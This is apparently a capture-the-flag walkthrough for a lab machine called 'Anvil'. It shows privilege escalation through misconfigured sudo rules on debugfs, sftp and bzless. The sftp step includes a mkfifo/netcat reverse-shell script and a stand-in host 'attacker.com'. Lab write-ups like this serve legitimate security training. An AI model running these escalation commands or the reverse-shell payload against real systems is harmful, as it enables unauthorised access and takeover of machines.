Box: Anvil

Level: Intermediate

Lets get started

Lets connect to the machine

command:nc -t 10.0.40.10 1337

cool we are connected to the target.

Running the sudo -l command

We can see that user silver can run the binary debugfs with sudo privileges. This is what we call Misconfigured SUDO Privileges

Checking GTFOBins, I found this

So, to escalate our privileges

command:sudo -u silver /sbin/debugfs

Good, now run this !/bin/sh

Nice, we were able to successfully escalate our privileges to user silver

Now, lets further escalate our privileges

Running the sudo -l command again,

So, user gold has sudo permissions to run the binary sftp

Checking GTFOBins, I found this

So we can try to do something like this

command:HOME=blackanon@attacker.com

cool, now run this sudo -u gold /usr/bin/sftp $HOST

oops, we can see that it’s ssh running here. So, I decided to trigger the help menu

We can use that switch to run a program, this means we can try to execute a reverse shell

Payload

#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f

Save this in a .sh file and send it over to the target

Cool, now lets execute that command again, but this time ensure you have your netcat listener set up

command

chmod +x bash.sh
HOST=blackanon@attacker.com
sudo -u gold /usr/bin/sftp -S /tmp/bash.sh $HOST

It worked, we got a shell as user gold.

Further escalating our privileges

Running the sudo -l command again

We see that user ETSCTF can run the binary bzless with sudo privileges

To do this,

command:sudo -u ETSCTF /bin/bzless

It requires a file parameter, what if we tried something like this

command:sudo -u ETSCTF /bin/bzless /bin/bash

We get this, so just run this !/bin/sh

Hit the enter key,

It worked hehe.

We have successfully completed this exercise😎

That will be all for today

Back To Home